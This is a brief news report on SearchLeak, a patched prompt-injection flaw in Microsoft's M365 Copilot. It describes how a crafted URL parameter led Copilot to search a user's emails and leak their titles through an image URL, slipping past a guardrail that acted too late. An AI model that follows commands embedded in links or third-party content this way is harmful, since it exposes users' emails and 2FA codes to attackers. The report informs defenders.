Microsoft patched a critical vulnerability in its M365 Copilot AI platform after researchers revealed how it could be exploited to steal 2FA codes and other sensitive data from emails. The researchers demonstrated a proof-of-concept attack that bypassed security guardrails, allowing hackers to exfiltrate data without user interaction. The vulnerability, rated as max critical, highlights ongoing challenges in securing AI-driven systems against malicious commands.

The attack, dubbed SearchLeak, leveraged a technique called Parameter-to-Prompt Injection, where an attacker sent a URL with a query parameter to trigger Copilot’s search functionality. The malicious command instructed Copilot to search the user’s emails, extract titles, and embed them in an image URL. The victim clicked a link, and Copilot executed the command without user input. Researchers noted that Copilot’s guardrail, which wraps output in blocks, only activated after the 'thinking' phase, allowing the request to leave the browser before the protection kicked in.

Microsoft and other LLM providers have struggled to prevent their models from complying with malicious requests to reveal data. The root cause is that AI bots cannot distinguish between user instructions and those embedded in third-party content they summarize or use for actions. Guardrails, such as restricting access to untrusted sites, are designed to mitigate risks but are easily circumvented by attackers using workarounds like markup language or Bing as a trampoline. Varonis researchers highlighted that the exploit could access emails, meeting invites, notes, and other business content, with the potential to extend further depending on M365 integration.

Source: arstechnica